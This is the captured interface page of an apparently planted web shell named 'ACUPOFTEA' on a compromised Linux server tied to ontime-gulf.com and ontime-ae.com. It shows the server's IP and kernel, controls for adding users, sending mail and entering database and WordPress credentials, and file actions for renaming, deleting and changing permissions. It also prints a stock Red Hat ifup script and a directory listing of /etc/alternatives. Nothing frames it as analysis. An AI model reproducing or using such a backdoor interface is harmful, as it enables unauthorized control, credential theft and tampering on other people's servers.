System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
etc
/
alternatives
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
ifup
#!/bin/bash # Network Interface Configuration System # Copyright (c) 1996-2009 Red Hat, Inc. all rights reserved. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License, version 2, # as published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. unset WINDOW # defined by screen, conflicts with our usage . /etc/init.d/functions cd /etc/sysconfig/network-scripts . ./network-functions [ -f ../network ] && . ../network CONFIG=${1} [ -z "${CONFIG}" ] && { echo $"Usage: ifup <configuration>" >&2 exit 1 } if ! [ -f /etc/sysconfig/disable-deprecation-warnings ] && ! is_true ${DEPRECATION_WARNING_ISSUED}; then net_log $"You are using 'ifup' script provided by 'network-scripts', which are now deprecated." warning ifup >&2 net_log $"'network-scripts' will be removed in one of the next major releases of RHEL." warning ifup >&2 net_log $"It is advised to switch to 'NetworkManager' instead - it provides 'ifup/ifdown' scripts as well." warning ifup >&2 fi need_config "${CONFIG}" [ -f "${CONFIG}" ] || { echo $"$0: configuration for ${1} not found." >&2 echo $"Usage: ifup <configuration>" >&2 exit 1 } if [ ${UID} != 0 ]; then if [ -x /usr/sbin/usernetctl ]; then source_config if /usr/sbin/usernetctl ${CONFIG} report ; then exec /usr/sbin/usernetctl ${CONFIG} up fi fi echo $"Users cannot control this device." >&2 exit 1 fi source_config if [ "foo$2" = "fooboot" ] && [ "${ONBOOT}" = "no" -o "${ONBOOT}" = "NO" ] then exit 0 fi if [ -n "$IN_HOTPLUG" ] && [ "${HOTPLUG}" = "no" -o "${HOTPLUG}" = "NO" ] then exit 0 fi if [ -n "$IN_HOTPLUG" -a "${TYPE}" = "Bridge" ]; then exit 0 fi if [ "$_use_nm" = "true" -a -n "$UUID" -a "$REALDEVICE" != "lo" ]; then if [ "foo$2" = "fooboot" ] && [ "${TYPE}" = "Wireless" ]; then exit 0 fi [ -n "${DEVICE}" ] && is_nm_handling ${DEVICE} && exit 0 nmcli con up uuid "$UUID" exit $? fi # Ethernet 802.1Q VLAN support if [ "${VLAN}" = "yes" ] && [ "$ISALIAS" = "no" ] && [ -n "$DEVICE" ]; then if [ -n "${VID}" ]; then if test -z "$PHYSDEV"; then net_log $"PHYSDEV should be set for device ${DEVICE}" exit 1 fi else VID="" MATCH='^.+\.[0-9]{1,4}$' if [[ "${DEVICE}" =~ $MATCH ]]; then VID=$(echo "${DEVICE}" | LC_ALL=C sed 's/^.*\.\([0-9]\+\)/\1/') PHYSDEV=${DEVICE%.*} fi MATCH='^vlan[0-9]{1,4}?' if [[ "${DEVICE}" =~ $MATCH ]]; then VID=$(echo "${DEVICE}" | LC_ALL=C sed 's/^vlan0*//') # PHYSDEV should be set in ifcfg-vlan* file if test -z "$PHYSDEV"; then net_log $"PHYSDEV should be set for device ${DEVICE}" exit 1 fi fi fi if [ -n "$VID" ]; then if [ ! -d /proc/net/vlan ]; then if ! modprobe 8021q >/dev/null 2>&1 ; then net_log $"No 802.1Q VLAN support available in kernel for device ${DEVICE}" exit 1 fi fi is_available_wait ${PHYSDEV} ${DEVTIMEOUT} || { if [ "$?" = "1" ] ; then net_log $"$alias device ${DEVICE} does not seem to be present, delaying initialization." exit 1 else exit 0 fi } # Link on Physical device needs to be up but no ip required check_device_down ${PHYSDEV} && set_link_up ${PHYSDEV} if [ ! -f /proc/net/vlan/${DEVICE} ]; then if [ "${REORDER_HDR}" = "no" -o "${REORDER_HDR}" = "0" ]; then FLAG_REORDER_HDR="reorder_hdr off" fi if [ "${GVRP}" = "yes" -o "${GVRP}" = "1" ]; then FLAG_GVRP="gvrp on" fi ip link add dev ${DEVICE} link ${PHYSDEV} type vlan id ${VID} ${FLAG_REORDER_HDR} ${FLAG_GVRP} || { (/usr/bin/logger -p daemon.info -t ifup \ $"ERROR: could not add vlan ${VID} as ${DEVICE} on dev ${PHYSDEV}" &) & net_log $"ERROR: could not add vlan ${VID} as ${DEVICE} on dev ${PHYSDEV}" exit 1 } [ -n "${VLAN_EGRESS_PRIORITY_MAP}" ] && ip link set dev ${DEVICE} type vlan egress ${VLAN_EGRESS_PRIORITY_MAP} fi fi /usr/lib/systemd/systemd-sysctl \ --prefix "/proc/sys/net/ipv4/conf/${DEVICE}" \ --prefix "/proc/sys/net/ipv6/conf/${DEVICE}" fi if [ "${BOOTPROTO}" = "bootp" -o "${BOOTPROTO}" = "dhcp" ]; then DYNCONFIG=true fi if [ -x /sbin/ifup-pre-local ]; then /sbin/ifup-pre-local ${CONFIG} $2 fi OTHERSCRIPT="/etc/sysconfig/network-scripts/ifup-${DEVICETYPE}" if [ ! -x ${OTHERSCRIPT} ]; then OTHERSCRIPT="/etc/sysconfig/network-scripts/ifup-${TYPE}" fi if [ ! -x ${OTHERSCRIPT} ]; then OTHERSCRIPT="/etc/sysconfig/network-scripts/ifup-eth" fi exec ${OTHERSCRIPT} ${CONFIG} $2
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-02-24 10:59:17
..
DIR
-
drwxr-xr-x
2025-10-27 05:40:42
cifs-idmap-plugin
application/x-sharedlib
11.49 KB
-rwxr-xr-x
2025-06-05 07:42:53
easy_install-3
text/x-python
246 B
-rwxr-xr-x
2025-07-15 09:13:40
ifdown
text/x-shellscript
2.07 KB
-rwxr-xr-x
2022-08-10 01:03:37
ifup
text/x-shellscript
5.33 KB
-rwxr-xr-x
2022-08-10 01:03:37
ld
application/x-sharedlib
1.71 MB
-rwxr-xr-x
2025-10-07 06:44:04
libnssckbi.so.x86_64
application/x-sharedlib
249.24 KB
-rwxr-xr-x
2024-04-06 02:16:19
module.1.gz
application/x-gzip
15.14 KB
-rw-r--r--
2023-10-14 06:46:13
modulecmd
text/plain
384.75 KB
-rwxr-xr-x
2023-10-14 06:46:13
modulefile.4.gz
application/x-gzip
10.05 KB
-rw-r--r--
2023-10-14 06:46:13
modules.csh
text/plain
105 B
-rw-r--r--
2023-10-14 06:46:13
modules.sh
text/plain
448 B
-rw-r--r--
2023-10-14 06:46:13
ncman
application/x-gzip
6.05 KB
-rw-r--r--
2025-01-05 11:13:16
nmap
application/x-sharedlib
49.27 KB
-rwxr-xr-x
2025-01-05 11:13:17
pip-3
text/plain
209 B
-rwxr-xr-x
2024-04-06 01:40:45
pip3
text/plain
209 B
-rwxr-xr-x
2024-04-06 01:40:45
pydoc-3
text/plain
89 B
-rwxr-xr-x
2025-08-26 09:08:07
pydoc3
text/plain
89 B
-rwxr-xr-x
2025-08-26 09:08:07
python
text/x-shellscript
157 B
-rwxr-xr-x
2025-08-26 09:08:20
python3
application/x-sharedlib
11.59 KB
-rwxr-xr-x
2025-08-26 09:08:24
python3-config
text/x-shellscript
204 B
-rwxr-xr-x
2025-08-26 09:08:08
python3-man
application/x-gzip
5.1 KB
-rw-r--r--
2018-12-23 09:37:14
pyvenv-3
text/plain
446 B
-rwxr-xr-x
2025-08-26 09:08:07
unversioned-python-man
application/x-gzip
603 B
-rw-r--r--
2025-08-26 09:08:20
~ ACUPOFTEA - mail.ontime-ae.com